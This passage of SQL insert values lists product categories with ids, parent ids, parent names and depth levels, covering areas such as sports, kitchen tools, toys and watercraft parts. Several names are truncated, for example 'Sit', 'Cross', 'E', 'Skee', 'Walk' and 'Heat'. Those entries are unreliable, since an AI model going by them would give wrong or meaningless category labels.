(3105,'Tennis Ball Hoppers & Carts',1065,'Tennis',3),
(3106,'Golf Tees',1043,'Golf',3),
(3107,'Badminton Nets',1062,'Badminton',4),
(3109,'Dart Shafts',3327,'Dart Parts',4),
(3110,'Food Wraps',2626,'Food Storage',3),
(3111,'Lancing Devices',3688,'Blood Glucose Meter Accessories',4),
(3113,'Tennis Balls',1065,'Tennis',3),
(3116,'Airsoft Gun Parts & Accessories',2443,'Airsoft',5),
(3117,'Video Game Arcade Cabinets',3356,'Arcade Equipment',2),
(3118,'Bicycle Cleats',3982,'Cycling Apparel & Accessories',4),
(3119,'Racquetball & Squash Eyewear',503752,'Racquetball & Squash',3),
(3120,'Hedge Trimmers',3798,'Outdoor Power Equipment',3),
(3121,'Inductors',3635,'Passive Circuit Components',3),
(3123,'Gymnastics Springboards',1000,'Gymnastics',3),
(3124,'Vacuum Sealer Bags',3523,'Vacuum Sealer Accessories',4),
(3125,'Clay Pigeon Shooting',499824,'Hunting & Shooting',3),
(3126,'Tetherball',499846,'Outdoor Games',3),
(3127,'Skate Rails',3276,'Skateboarding',3),
(3128,'Bicycle Bibs',5697,'Bicycle Activewear',4),
(3129,'Pretend Professions & Role Playing',3229,'Pretend Play',3),
(3130,'Camera Battery Chargers',7166,'Battery Accessories',4),
(3132,'Ping Pong Robot Accessories',1008,'Ping Pong',3),
(3135,'Billiard Balls',1003,'Billiards',3),
(3136,'Hunting',499824,'Hunting & Shooting',3),
(3139,'Billiard Tables',1003,'Billiards',3),
(3140,'Pinball Machines',3356,'Arcade Equipment',2),
(3141,'Soccer Gloves',1111,'Soccer',3),
(3143,'Watercraft Alternators',3606,'Watercraft Engine Parts',4),
(3144,'Holiday Ornaments',596,'Seasonal & Holiday Decorations',3),
(3148,'Shuffleboard Tables',1009,'Table Shuffleboard',3),
(3149,'Track Hurdles',1060,'Track & Field',3),
(3151,'Cigarettes',435,'Tobacco Products',2),
(3156,'Food Graters & Zesters',668,'Kitchen Tools & Utensils',3),
(3160,'Power Strips & Surge Suppressors',275,'Power',3),
(3163,'Marble Track Sets',1254,'Building Toys',3),
(3164,'Free Weights',499793,'Weight Lifting',3),
(3166,'Toy Playsets',1255,'Dolls, Playsets & Toy Figures',3),
(3170,'Shooting Targets',499840,'Shooting & Range Accessories',4),
(3172,'Foam Blocks',1254,'Building Toys',3),
(3173,'Gardening Tools',2962,'Gardening',3),
(3175,'Scoops',668,'Kitchen Tools & Utensils',3),
(3176,'Guitar Tuning Pegs',3502,'Guitar Accessories',5),
(3177,'Kitchen Counter & Beverage Station Organizers',2948,'Kitchen Organizers',4),
(3178,'Guitar Strings',3502,'Guitar Accessories',5),
(3181,'Deli Slicers',730,'Kitchen Appliances',3),
(3182,'Pommel Horses',1000,'Gymnastics',3),
(3183,'Billiard Table Parts & Accessories',1003,'Billiards',3),
(3185,'Lamp Shades',2956,'Lighting Accessories',2),
(3187,'Paintball Gun Parts & Accessories',1049,'Paintball',5),
(3188,'Bicycle Shorts & Briefs',5697,'Bicycle Activewear',4),
(3189,'Anchors',3315,'Docking & Anchoring',4),
(3190,'Deck Shuffleboard Pucks',3787,'Deck Shuffleboard',4),
(3191,'Baseball Uniforms',3598,'Sports Uniforms',4),
(3192,'Skateboard Trucks',3670,'Skateboard Parts',4),
(3195,'Towed Water Sports',499811,'Boating & Water Sports',3),
(3196,'Spatulas',668,'Kitchen Tools & Utensils',3),
(3199,'Fitness Toys',1266,'Sports Toys',3),
(3201,'Climbing Rope Bags',7059,'Climbing',3),
(3202,'Ice Cream Scoops',3175,'Scoops',4),
(3204,'Lacrosse Training Aids',499741,'Field Hockey & Lacrosse',3),
(3206,'Kitchen Slicers',668,'Kitchen Tools & Utensils',3),
(3207,'Ball Pits',1253,'Toys',2),
(3208,'Liquid Hand Soap',474,'Bath & Body',4),
(3210,'Shaper Cutters',3470,'Shaper Accessories',3),
(3211,'Climbing Chalk Bags',7059,'Climbing',3),
(3212,'Bubble Blowing Solution',4352,'Activity Toys',3),
(3213,'GPS Mounts',3895,'GPS Accessories',2),
(3214,'Bicycle Accessories',1025,'Cycling',3),
(3215,'Hula Hoops',3199,'Fitness Toys',4),
(3216,'Bicycle Wheels',3618,'Bicycle Parts',4),
(3217,'Weight Lifting Machine & Exercise Bench Accessories',499793,'Weight Lifting',3),
(3218,'Climbing Harnesses',7059,'Climbing',3),
(3219,'Bowling Balls',1004,'Bowling',3),
(3220,'Capacitors',3635,'Passive Circuit Components',3),
(3221,'Home Decor Decals',696,'Decor',2),
(3222,'Billiard Cue Accessories',1003,'Billiards',3),
(3224,'Handheld Circular Saws',1235,'Saws',3),
(3226,'Golf Toys',1266,'Sports Toys',3),
(3227,'Disc Golf Baskets',3484,'Disc Golf',4),
(3229,'Pretend Play',1253,'Toys',2),
(3230,'Automated External Defibrillators',3477,'Medical Equipment',3),
(3232,'Watercraft Manifolds',3619,'Watercraft Exhaust Parts',4),
(3234,'Paintball Guns',1049,'Paintball',5),
(3235,'Boxing Gloves & Mitts',4008,'Boxing & Martial Arts Protective Gear',4),
(3237,'Live Animals',1,'Animals & Pet Supplies',1),
(3238,'Aquariums',6,'Fish Supplies',3),
(3239,'Coffee Decanters',3988,'Coffee Maker & Espresso Machine Accessories',4),
(3240,'Sandpaper & Sanding Sponges',4487,'Sanding Accessories',3),
(3241,'Skate Lace Tighteners',3791,'Ice Skate Parts & Accessories',4),
(3242,'Wireless Transmitters',3727,'Stage Equipment',3),
(3243,'Bicycle Computers',3214,'Bicycle Accessories',4),
(3245,'Air Hockey Tables',1002,'Air Hockey',3),
(3246,'Bicycle Gloves',3982,'Cycling Apparel & Accessories',4),
(3247,'Football Chin Straps',3060,'Football Helmet Accessories',5),
(3248,'Meat Tenderizers',668,'Kitchen Tools & Utensils',3),
(3250,'Dart Tips',3327,'Dart Parts',4),
(3252,'Toy Instruments',1264,'Musical Toys',3),
(3253,'Officiating Uniforms',3598,'Sports Uniforms',4),
(3256,'Kitchen Scrapers',668,'Kitchen Tools & Utensils',3),
(3257,'Horse Care',1031,'Equestrian',3),
(3258,'Melon Ballers',3175,'Scoops',4),
(3260,'Bowling Wrist Supports',1004,'Bowling',3),
(3261,'Fencing Protective Gear',1006,'Fencing',3),
(3262,'World Globes',696,'Decor',2),
(3263,'Toy Parachutes',1261,'Flying Toys',3),
(3265,'Riding Crops & Whips',5594,'Riding Apparel & Accessories',4),
(3266,'Climbing Protection Devices',7059,'Climbing',3),
(3268,'Dish Racks & Drain Boards',668,'Kitchen Tools & Utensils',3),
(3269,'Ballet Barres',989,'Dancing',3),
(3270,'Electronic Tuners',55,'Musical Instrument & Orchestra Accessories',3),
(3271,'Weight Bars',6452,'Free Weight Accessories',4),
(3272,'Bicycle Shoe Covers',3982,'Cycling Apparel & Accessories',4),
(3273,'Money Changers',4181,'Money Handling',3),
(3276,'Skateboarding',1011,'Outdoor Recreation',2),
(3277,'Watercraft Pistons & Parts',3606,'Watercraft Engine Parts',4),
(3280,'Tool Cabinets & Chests',3974,'Tool Storage & Organization',3),
(3281,'Soldering Iron Accessories',3650,'Tool Accessories',2),
(3282,'Wakeboarding',3195,'Towed Water Sports',4),
(3283,'GPS Map Data & Software',313,'Computer Software',2),
(3284,'Jerky',423,'Snack Foods',3),
(3285,'Windsurfing Board Masts',3624,'Windsurfing Board Parts',5),
(3287,'Interlocking Blocks',1254,'Building Toys',3),
(3288,'Pretend Lawn & Garden',3229,'Pretend Play',3),
(3289,'Sit',1146,'Water Skiing',5),
(3291,'Arrow Parts & Accessories',1033,'Archery',4),
(3292,'Bicycle Saddles',3618,'Bicycle Parts',4),
(3293,'Water Coolers',730,'Kitchen Appliances',3),
(3294,'Mashers',668,'Kitchen Tools & Utensils',3),
(3295,'Tennis Racquet Grommets',3658,'Tennis Racquet Accessories',4),
(3296,'Toy Trucks & Construction Vehicles',2505,'Play Vehicles',3),
(3297,'Punching & Training Bags',499720,'Boxing & Martial Arts Training Equipment',4),
(3298,'Toy Kitchens & Play Food',3229,'Pretend Play',3),
(3300,'Router Tables',3744,'Router Accessories',3),
(3301,'Kaleidoscopes',3562,'Visual Toys',3),
(3304,'Swim Gloves',1144,'Swimming',4),
(3305,'Clay Pigeon Throwers',3125,'Clay Pigeon Shooting',4),
(3306,'Microphone Accessories',1420,'Audio Accessories',3),
(3307,'Rug Pads',630,'Household Supplies',2),
(3308,'Watercraft Steering Cables',3995,'Watercraft Steering Parts',4),
(3309,'Watercraft Mufflers & Parts',3619,'Watercraft Exhaust Parts',4),
(3311,'Riding Mowers',694,'Lawn Mowers',4),
(3314,'Climbing Helmets',499815,'Climbing Apparel & Accessories',4),
(3315,'Docking & Anchoring',3391,'Watercraft Parts & Accessories',3),
(3318,'Motor Vehicle Lighting',899,'Motor Vehicle Parts',3),
(3319,'Cotton Candy Machines',730,'Kitchen Appliances',3),
(3320,'Surfboards',1143,'Surfing',4),
(3321,'Watercraft Engine Controls',3606,'Watercraft Engine Parts',4),
(3322,'Climbing Crash Pads',7059,'Climbing',3),
(3324,'Sustain Pedals',60,'Musical Keyboard Accessories',4),
(3326,'Vehicle Jumper Cables',8236,'Vehicle Repair & Specialty Tools',4),
(3327,'Dart Parts',1005,'Throwing Darts',3),
(3328,'Cable Management',2082,'Electronics Accessories',2),
(3329,'LED Light Bulbs',2425,'Light Bulbs',3),
(3330,'Serving Pitchers & Carafes',4026,'Serveware',4),
(3331,'Cross',6064,'Skis',5),
(3332,'Compound Bows',499825,'Bows & Crossbows',5),
(3334,'Fishing',1011,'Outdoor Recreation',2),
(3336,'Lacrosse Stick Parts',499741,'Field Hockey & Lacrosse',3),
(3337,'Bread Boxes & Bags',2626,'Food Storage',3),
(3339,'Cricket Gloves',499736,'Cricket Protective Gear',4),
(3340,'Leaf Blowers',3798,'Outdoor Power Equipment',3),
(3341,'Bicycle Baskets',3214,'Bicycle Accessories',4),
(3343,'Football Helmet Padding',3060,'Football Helmet Accessories',5),
(3345,'Ping Pong Tables',1008,'Ping Pong',3),
(3347,'Basters',668,'Kitchen Tools & Utensils',3),
(3348,'Household Appliance Accessories',536,'Home & Garden',1),
(3350,'Water Skis',1146,'Water Skiing',5),
(3352,'Racquet Vibration Dampeners',3658,'Tennis Racquet Accessories',4),
(3353,'Wakeboards',3282,'Wakeboarding',5),
(3354,'Cheerleading',499713,'Athletics',2),
(3355,'Household Thermometers',630,'Household Supplies',2),
(3356,'Arcade Equipment',222,'Electronics',1),
(3358,'Folding Chairs & Stools',443,'Chairs',2),
(3359,'Fishing Hooks',499823,'Fishing Tackle',4),
(3360,'Swim Goggles & Masks',1144,'Swimming',4),
(3361,'Beer Pong',3735,'Drinking Games',4),
(3362,'Anchor Lines & Ropes',3315,'Docking & Anchoring',4),
(3363,'Belay Devices',7059,'Climbing',3),
(3364,'Wheelchairs',520,'Accessibility Equipment',4),
(3366,'Fencing Gloves & Cuffs',3261,'Fencing Protective Gear',4),
(3367,'Cat Food',4,'Cat Supplies',3),
(3368,'Bicycle Mirrors',3214,'Bicycle Accessories',4),
(3369,'Climbing Webbing',7059,'Climbing',3),
(3370,'Kneeboarding',3195,'Towed Water Sports',4),
(3371,'Toy Footballs',1266,'Sports Toys',3),
(3373,'Sugar Bowls & Creamers',4026,'Serveware',4),
(3374,'Bow Rosin',4806,'String Instrument Care & Cleaning',5),
(3375,'Ping Pong Paddles & Sets',1008,'Ping Pong',3),
(3376,'Rash Guards & Swim Shirts',499813,'Boating & Water Sport Apparel',4),
(3378,'Toy Gliders',1261,'Flying Toys',3),
(3379,'Softball Uniforms',3598,'Sports Uniforms',4),
(3381,'Food Crackers',668,'Kitchen Tools & Utensils',3),
(3382,'Outdoor Grill Racks & Toppers',3684,'Outdoor Grill Accessories',4),
(3385,'Garlic Presses',668,'Kitchen Tools & Utensils',3),
(3387,'Flash Memory Cards',384,'Flash Memory',4),
(3388,'Rakes',3173,'Gardening Tools',4),
(3389,'Javelins',1060,'Track & Field',3),
(3390,'Pickleball',499846,'Outdoor Games',3),
(3391,'Watercraft Parts & Accessories',5613,'Vehicle Parts & Accessories',2),
(3392,'Guitar Humidifiers',3502,'Guitar Accessories',5),
(3395,'Aircraft',5614,'Vehicles',2),
(3400,'Watercraft Fuel Systems',3391,'Watercraft Parts & Accessories',3),
(3402,'Humidifier Filters',3862,'Humidifier Accessories',3),
(3403,'Tennis Racquet Grips & Tape',3658,'Tennis Racquet Accessories',4),
(3405,'Lawn Games',499846,'Outdoor Games',3),
(3406,'Row Boats',1120,'Boating & Rafting',4),
(3407,'Hair Straighteners',6019,'Hair Styling Tools',4),
(3408,'Paintball Grenades',1049,'Paintball',5),
(3410,'Air Purifier Accessories',3348,'Household Appliance Accessories',2),
(3411,'Boxing Ring Parts',499719,'Boxing & Martial Arts',3),
(3412,'Electric Guitar Pickups',3502,'Guitar Accessories',5),
(3413,'Windsurfing Sails',1148,'Windsurfing',4),
(3414,'Security Uniforms',2306,'Uniforms',3),
(3415,'Watercraft Fuel Lines & Parts',3400,'Watercraft Fuel Systems',4),
(3416,'Development Boards',7264,'Printed Circuit Boards',3),
(3418,'Lacrosse Stick Heads',3336,'Lacrosse Stick Parts',4),
(3419,'Bench Scrapers',3256,'Kitchen Scrapers',4),
(3421,'Pizza Cutters',668,'Kitchen Tools & Utensils',3),
(3422,'Memory Accessories',2082,'Electronics Accessories',2),
(3423,'Lacrosse Stick Shafts',3336,'Lacrosse Stick Parts',4),
(3424,'Resistors',3635,'Passive Circuit Components',3),
(3425,'Print Servers',342,'Networking',2),
(3426,'Bridles',5593,'Horse Tack',4),
(3427,'Bottle Openers',651,'Cocktail Shakers & Tools',4),
(3428,'Bicycle Stands & Storage',3214,'Bicycle Accessories',4),
(3430,'Basting Brushes',668,'Kitchen Tools & Utensils',3),
(3435,'Canteens',2920,'Food & Beverage Carriers',3),
(3436,'Vehicle Covers',913,'Vehicle Maintenance, Care & Decor',3),
(3437,'Whips',780,'Weapons',2),
(3438,'Paintballs',1049,'Paintball',5),
(3439,'Basketball Uniforms',3598,'Sports Uniforms',4),
(3440,'Beer Pong Tables',3361,'Beer Pong',5),
(3441,'Rocking & Spring Riding Toys',2799,'Riding Toys',3),
(3442,'Football Gloves',1093,'Football',3),
(3443,'Dishwasher Parts & Accessories',2901,'Kitchen Appliance Accessories',3),
(3444,'Toy Airplanes',2505,'Play Vehicles',3),
(3445,'High Jump Crossbars',1060,'Track & Field',3),
(3446,'Pretzels',423,'Snack Foods',3),
(3450,'Coffee Filters',3988,'Coffee Maker & Espresso Machine Accessories',4),
(3452,'Anchor Chains',3315,'Docking & Anchoring',4),
(3454,'Climbing Ascenders & Descenders',7059,'Climbing',3),
(3455,'Bicycle Jerseys',5697,'Bicycle Activewear',4),
(3456,'Laundry Appliance Accessories',3348,'Household Appliance Accessories',2),
(3457,'Stationery',956,'Paper Products',3),
(3459,'Push & Pull Toys',2847,'Baby Toys & Activity Equipment',2),
(3460,'Kites',1261,'Flying Toys',3),
(3461,'KVM Cables',259,'Cables',3),
(3463,'Watercraft Carburetors & Parts',3606,'Watercraft Engine Parts',4),
(3465,'Percussion Accessories',55,'Musical Instrument & Orchestra Accessories',3),
(3466,'Spinning Tops',4352,'Activity Toys',3),
(3467,'Rolling Pins',668,'Kitchen Tools & Utensils',3),
(3469,'Billiard Table Lights',1003,'Billiards',3),
(3470,'Shaper Accessories',3650,'Tool Accessories',2),
(3472,'Motor Vehicle Carrying Racks',8237,'Vehicle Storage & Cargo',3),
(3473,'Music Boxes',696,'Decor',2),
(3474,'Toy Race Car & Track Sets',2505,'Play Vehicles',3),
(3475,'Measuring Cups & Spoons',668,'Kitchen Tools & Utensils',3),
(3476,'Whitewater Rafts',1120,'Boating & Rafting',4),
(3477,'Medical Equipment',2496,'Medical',2),
(3478,'Discus',1060,'Track & Field',3),
(3479,'Drinkware Holders',2948,'Kitchen Organizers',4),
(3480,'Anchor Windlasses',3315,'Docking & Anchoring',4),
(3484,'Disc Golf',499846,'Outdoor Games',3),
(3487,'Rugby Gloves',1110,'Rugby',3),
(3488,'Skateboarding Pads',3067,'Skateboarding Protective Gear',4),
(3489,'Breadmaker Accessories',2901,'Kitchen Appliance Accessories',3),
(3491,'Sprinkler Valves',3780,'Sprinkler Accessories',4),
(3492,'Football Goal Posts',1093,'Football',3),
(3494,'Reciprocating Saws',1235,'Saws',3),
(3495,'Hunting & Survival Knives',3937,'Camping Tools',4),
(3497,'Football Neck Rolls',1097,'Football Protective Gear',4),
(3498,'Bowls',673,'Dinnerware',4),
(3500,'Science & Exploration Sets',1262,'Educational Toys',3),
(3501,'Post Hole Diggers',1167,'Tools',2),
(3502,'Guitar Accessories',61,'String Instrument Accessories',4),
(3505,'Crossbows',499825,'Bows & Crossbows',5),
(3506,'Toy Helicopters',2505,'Play Vehicles',3),
(3507,'Watercraft Motor Locks',3606,'Watercraft Engine Parts',4),
(3508,'Chemical Hand Warmers',1013,'Camping & Hiking',3),
(3509,'Temporary Tattoos',477,'Makeup',4),
(3510,'Football Girdles',1097,'Football Protective Gear',4),
(3512,'Mobility Scooters',520,'Accessibility Equipment',4),
(3515,'Sports Fan Accessories',3865,'Sports Collectibles',4),
(3516,'Cut',1235,'Saws',3),
(3517,'Miter Saws',1235,'Saws',3),
(3518,'Indoor Climbing Holds',7059,'Climbing',3),
(3521,'Food Peelers & Corers',668,'Kitchen Tools & Utensils',3),
(3522,'Lighting Timers',2956,'Lighting Accessories',2),
(3523,'Vacuum Sealer Accessories',2901,'Kitchen Appliance Accessories',3),
(3524,'Foosball Table Parts & Accessories',1007,'Foosball',3),
(3525,'Surfboard Fins',1143,'Surfing',4),
(3526,'Milk Frothers & Steamers',730,'Kitchen Appliances',3),
(3528,'Clay Pigeons',3125,'Clay Pigeon Shooting',4),
(3530,'Dog Food',5,'Dog Supplies',3),
(3531,'Tricycles',1025,'Cycling',3),
(3532,'Remote Control Boats & Watercraft',2546,'Remote Control Toys',3),
(3533,'Arrows & Bolts',1033,'Archery',4),
(3534,'Marbles',4352,'Activity Toys',3),
(3535,'Bowling Gloves',1004,'Bowling',3),
(3536,'Lacrosse Balls',499741,'Field Hockey & Lacrosse',3),
(3538,'Mosquito Nets & Insect Screens',1013,'Camping & Hiking',3),
(3539,'E',298,'Handheld Devices',3),
(3540,'Watercraft',5614,'Vehicles',2),
(3541,'Telephone Cables',259,'Cables',3),
(3542,'Weight Lifting Machines & Racks',499793,'Weight Lifting',3),
(3543,'Cricket Helmets',499736,'Cricket Protective Gear',4),
(3544,'Baseball & Softball Bases & Plates',1070,'Baseball & Softball',3),
(3546,'Ping Pong Robots',1008,'Ping Pong',3),
(3547,'Billiard Table Cloth',3183,'Billiard Table Parts & Accessories',4),
(3548,'Air Hockey Table Parts',1002,'Air Hockey',3),
(3549,'Snowmobiles',1267,'Motor Vehicles',3),
(3550,'Ski & Snowboard Goggles',499845,'Skiing & Snowboarding',4),
(3551,'Toy Cars',2505,'Play Vehicles',3),
(3552,'Basketball Toys',1266,'Sports Toys',3),
(3553,'Plates',673,'Dinnerware',4),
(3554,'Remote Control Helicopters',2546,'Remote Control Toys',3),
(3556,'Water Tables',6464,'Water Play Equipment',3),
(3558,'Bicycle Transport Bags & Cases',3214,'Bicycle Accessories',4),
(3559,'Dartboards',1005,'Throwing Darts',3),
(3561,'Household Storage Bags',636,'Storage & Organization',3),
(3562,'Visual Toys',1253,'Toys',2),
(3565,'Tennis Ball Savers',1065,'Tennis',3),
(3566,'Watercraft Motor Mounts',3606,'Watercraft Engine Parts',4),
(3568,'Watering & Irrigation',689,'Lawn & Garden',2),
(3572,'Dock Cleats',3315,'Docking & Anchoring',4),
(3573,'Air Conditioner Filters',2367,'Air Conditioner Accessories',3),
(3574,'Billiard Pockets',3183,'Billiard Table Parts & Accessories',4),
(3575,'Water Polo Caps',1145,'Water Polo',3),
(3576,'Soccer Fan Accessories',3515,'Sports Fan Accessories',5),
(3577,'Homebrewing & Winemaking Supplies',5710,'Hobbies & Creative Arts',2),
(3578,'Golf Flags',1043,'Golf',3),
(3579,'Surfboard Cases & Bags',1143,'Surfing',4),
(3580,'Memory Card Readers',1928,'Input Devices',4),
(3582,'Band Saws',1235,'Saws',3),
(3583,'Hunting & Wildlife Decoys',8011,'Wildlife Attractants',5),
(3584,'Doll & Action Figure Accessories',1255,'Dolls, Playsets & Toy Figures',3),
(3586,'Lobster & Crab Crackers',3381,'Food Crackers',4),
(3588,'Musical Keyboard Stands',60,'Musical Keyboard Accessories',4),
(3589,'Toy Spaceships',2505,'Play Vehicles',3),
(3590,'Toy Motorcycles',2505,'Play Vehicles',3),
(3591,'Food Storage Bags',2626,'Food Storage',3),
(3594,'Hand Saws',1235,'Saws',3),
(3595,'Pull Buoys',1144,'Swimming',4),
(3596,'Swimming Machines',1144,'Swimming',4),
(3597,'Whisks',668,'Kitchen Tools & Utensils',3),
(3598,'Sports Uniforms',2306,'Uniforms',3),
(3599,'Autographs',216,'Collectibles',3),
(3601,'Remote Control Cars & Trucks',2546,'Remote Control Toys',3),
(3602,'Barometers',1305,'Measuring Tools & Sensors',3),
(3603,'Fishing Baits & Lures',499823,'Fishing Tackle',4),
(3606,'Watercraft Engine Parts',3391,'Watercraft Parts & Accessories',3),
(3609,'Soldering Iron Tips',3281,'Soldering Iron Accessories',3),
(3610,'Chainsaws',3798,'Outdoor Power Equipment',3),
(3614,'Fishing Nets',3334,'Fishing',3),
(3615,'Hockey Pants',1105,'Hockey Protective Gear',4),
(3616,'Wheelbarrows',3173,'Gardening Tools',4),
(3617,'Wooden Blocks',1254,'Building Toys',3),
(3618,'Bicycle Parts',1025,'Cycling',3),
(3619,'Watercraft Exhaust Parts',3391,'Watercraft Parts & Accessories',3),
(3620,'Ladles',668,'Kitchen Tools & Utensils',3),
(3621,'Football Shoulder Pads',1097,'Football Protective Gear',4),
(3622,'Fencing Weapons',1006,'Fencing',3),
(3623,'Ice Skate Sharpeners',3791,'Ice Skate Parts & Accessories',4),
(3624,'Windsurfing Board Parts',1148,'Windsurfing',4),
(3625,'Robotic Toys',1253,'Toys',2),
(3626,'Skate Ramps',3276,'Skateboarding',3),
(3627,'Toy Weapons & Gadgets',1253,'Toys',2),
(3629,'Soldering Iron Stands',3281,'Soldering Iron Accessories',3),
(3631,'Bicycle Training Wheels',3214,'Bicycle Accessories',4),
(3632,'Diodes',3991,'Semiconductors',3),
(3633,'Grill Scrapers',3256,'Kitchen Scrapers',4),
(3634,'Tricycle Accessories',1025,'Cycling',3),
(3635,'Passive Circuit Components',3702,'Circuit Boards & Components',2),
(3636,'Water Sport Tow Cables',3195,'Towed Water Sports',4),
(3637,'Skateboard Wheels',3670,'Skateboard Parts',4),
(3638,'Tennis Racquet Bags',3658,'Tennis Racquet Accessories',4),
(3639,'Bicycle Frames',3618,'Bicycle Parts',4),
(3640,'Yoga & Pilates Mats',999,'Yoga & Pilates',3),
(3641,'Foosball Balls',1007,'Foosball',3),
(3642,'Golf Club Parts & Accessories',1043,'Golf',3),
(3644,'Gardening Trowels',3173,'Gardening Tools',4),
(3646,'Guitar Stands',3502,'Guitar Accessories',5),
(3648,'Watercraft Fuel Tanks & Parts',3400,'Watercraft Fuel Systems',4),
(3649,'Surf Leashes',1143,'Surfing',4),
(3650,'Tool Accessories',632,'Hardware',1),
(3651,'Fishing Sinkers',499823,'Fishing Tackle',4),
(3652,'Boxing Rings',499719,'Boxing & Martial Arts',3),
(3654,'Weight Lifting Belts',499793,'Weight Lifting',3),
(3655,'Boat Hooks',3315,'Docking & Anchoring',4),
(3656,'Football Kicking Tees & Holders',1093,'Football',3),
(3658,'Tennis Racquet Accessories',1065,'Tennis',3),
(3659,'Pretend Electronics',3229,'Pretend Play',3),
(3661,'Alphabet Toys',2847,'Baby Toys & Activity Equipment',2),
(3663,'Watercraft Steering Wheels',3995,'Watercraft Steering Parts',4),
(3665,'Bowling Toys',1266,'Sports Toys',3),
(3666,'Swords',780,'Weapons',2),
(3667,'Air Purifier Filters',3410,'Air Purifier Accessories',3),
(3668,'Baseball & Softball Batting Helmets',1078,'Baseball & Softball Protective Gear',4),
(3669,'Bowling Pins',1004,'Bowling',3),
(3670,'Skateboard Parts',3276,'Skateboarding',3),
(3671,'Softballs',1070,'Baseball & Softball',3),
(3672,'Memory Cases',3422,'Memory Accessories',3),
(3673,'Router Bits',3744,'Router Accessories',3),
(3674,'Animal Traps',3136,'Hunting',4),
(3675,'Boomerangs',1266,'Sports Toys',3),
(3676,'Video Game Arcade Cabinet Accessories',3356,'Arcade Equipment',2),
(3677,'Remote Control Planes',2546,'Remote Control Toys',3),
(3678,'Water Polo Goals',1145,'Water Polo',3),
(3679,'Softball Bats',1070,'Baseball & Softball',3),
(3680,'Play Money & Banking',3229,'Pretend Play',3),
(3681,'Skee',3356,'Arcade Equipment',2),
(3682,'Cigars',435,'Tobacco Products',2),
(3683,'Cheerleading Uniforms',3598,'Sports Uniforms',4),
(3684,'Outdoor Grill Accessories',2901,'Kitchen Appliance Accessories',3),
(3685,'Nutcrackers',3381,'Food Crackers',4),
(3686,'Incense',592,'Home Fragrances',3),
(3688,'Blood Glucose Meter Accessories',5071,'Biometric Monitor Accessories',3),
(3689,'Deck Shuffleboard Cues',3787,'Deck Shuffleboard',4),
(3691,'Hand Sanitizers & Wipes',474,'Bath & Body',4),
(3692,'Clay & Modeling Dough',44,'Pottery & Sculpting Materials',5),
(3694,'Throwing Stars',780,'Weapons',2),
(3695,'Air Mattresses',1014,'Camp Furniture',4),
(3696,'Floor & Grandfather Clocks',3890,'Clocks',3),
(3697,'Sewing Patterns',505371,'Crafting Patterns & Molds',4),
(3698,'Bowling Ball Bags',1004,'Bowling',3),
(3699,'Chopsticks',675,'Flatware',4),
(3702,'Circuit Boards & Components',222,'Electronics',1),
(3703,'Gravy Boats',4026,'Serveware',4),
(3706,'Table Saws',1235,'Saws',3),
(3707,'Fencing Masks',3261,'Fencing Protective Gear',4),
(3708,'Ice Scoops',3175,'Scoops',4),
(3712,'USB Flash Drives',2414,'Storage Devices',4),
(3713,'Cooking Timers',668,'Kitchen Tools & Utensils',3),
(3714,'Racquetball Racquets',503752,'Racquetball & Squash',3),
(3715,'Recurve & Longbows',499825,'Bows & Crossbows',5),
(3717,'Martial Arts Belts',499719,'Boxing & Martial Arts',3),
(3718,'Boat Ladders',3315,'Docking & Anchoring',4),
(3719,'Bicycle Fenders',3214,'Bicycle Accessories',4),
(3720,'Billiard Cue Racks',3222,'Billiard Cue Accessories',4),
(3722,'Charging Valets',5558,'Clothing & Closet Storage',4),
(3723,'Food Dispensers',668,'Kitchen Tools & Utensils',3),
(3724,'Cricket Uniforms',3598,'Sports Uniforms',4),
(3725,'Jigsaws',1235,'Saws',3),
(3727,'Stage Equipment',223,'Audio',2),
(3729,'Bicycle Tights',5697,'Bicycle Activewear',4),
(3730,'Walk',694,'Lawn Mowers',4),
(3731,'Art & Drawing Toys',1253,'Toys',2),
(3733,'Bouncy Balls',4352,'Activity Toys',3),
(3735,'Drinking Games',96,'Party Supplies',3),
(3738,'Hiking Poles',1013,'Camping & Hiking',3),
(3740,'Bicycle Brake Parts',3618,'Bicycle Parts',4),
(3741,'Loose Tobacco',435,'Tobacco Products',2),
(3742,'Network Security & Firewall Devices',342,'Networking',2),
(3743,'Watercraft Ignition Parts',3606,'Watercraft Engine Parts',4),
(3744,'Router Accessories',3650,'Tool Accessories',2),
(3745,'Tool Files',1167,'Tools',2),
(3746,'Carabiners',7059,'Climbing',3),
(3747,'Baseball & Softball Batting Gloves',1070,'Baseball & Softball',3),
(3748,'Tree Stands',3136,'Hunting',4),
(3749,'Bingo Sets',3793,'Games',2),
(3750,'Plastic Wrap',3110,'Food Wraps',4),
(3751,'Toy Tools',3229,'Pretend Play',3),
(3754,'Billiard Table Brushes',3183,'Billiard Table Parts & Accessories',4),
(3755,'Billiard Gloves',1003,'Billiards',3),
(3756,'Hunting & Wildlife Calls',8011,'Wildlife Attractants',5),
(3757,'Quivers',1033,'Archery',4),
(3761,'Rugby Balls',1110,'Rugby',3),
(3762,'Surfing Tail Pads',1143,'Surfing',4),
(3764,'Cable Clips',3328,'Cable Management',3),
(3766,'Dart Flights',3327,'Dart Parts',4),
(3768,'Baking Peels',668,'Kitchen Tools & Utensils',3),
(3769,'PDAs',298,'Handheld Devices',3),
(3770,'Shot Puts',1060,'Track & Field',3),
(3772,'Golf Training Aids',1043,'Golf',3),
(3773,'Archery Armguards',1033,'Archery',4),
(3774,'Gymnastics Rings',1000,'Gymnastics',3),
(3775,'Acoustic Guitar Pickups',3502,'Guitar Accessories',5),
(3776,'Baseball Toys',1266,'Sports Toys',3),
(3777,'Pillboxes',491,'Health Care',2),
(3778,'Bicycle Bags & Panniers',3214,'Bicycle Accessories',4),
(3779,'Vaulting Horses',1000,'Gymnastics',3),
(3780,'Sprinkler Accessories',3568,'Watering & Irrigation',3),
(3781,'GPS Cases',3895,'GPS Accessories',2),
(3782,'Prisms',3562,'Visual Toys',3),
(3783,'Baseballs',1070,'Baseball & Softball',3),
(3785,'Lacrosse Mesh & String',3336,'Lacrosse Stick Parts',4),
(3787,'Deck Shuffleboard',499846,'Outdoor Games',3),
(3788,'Ping Pong Nets & Posts',1008,'Ping Pong',3),
(3789,'Hang Gliding & Skydiving',1011,'Outdoor Recreation',2),
(3790,'Baseball Bats',1070,'Baseball & Softball',3),
(3791,'Ice Skate Parts & Accessories',499915,'Figure Skating & Hockey',3),
(3792,'Toy Boats',2505,'Play Vehicles',3),
(3793,'Games',1239,'Toys & Games',1),
(3794,'Water Polo Balls',1145,'Water Polo',3),
(3797,'Heat',499768,'Conduit & Housings',3),
(3798,'Outdoor Power Equipment',689,'Lawn & Garden',2),
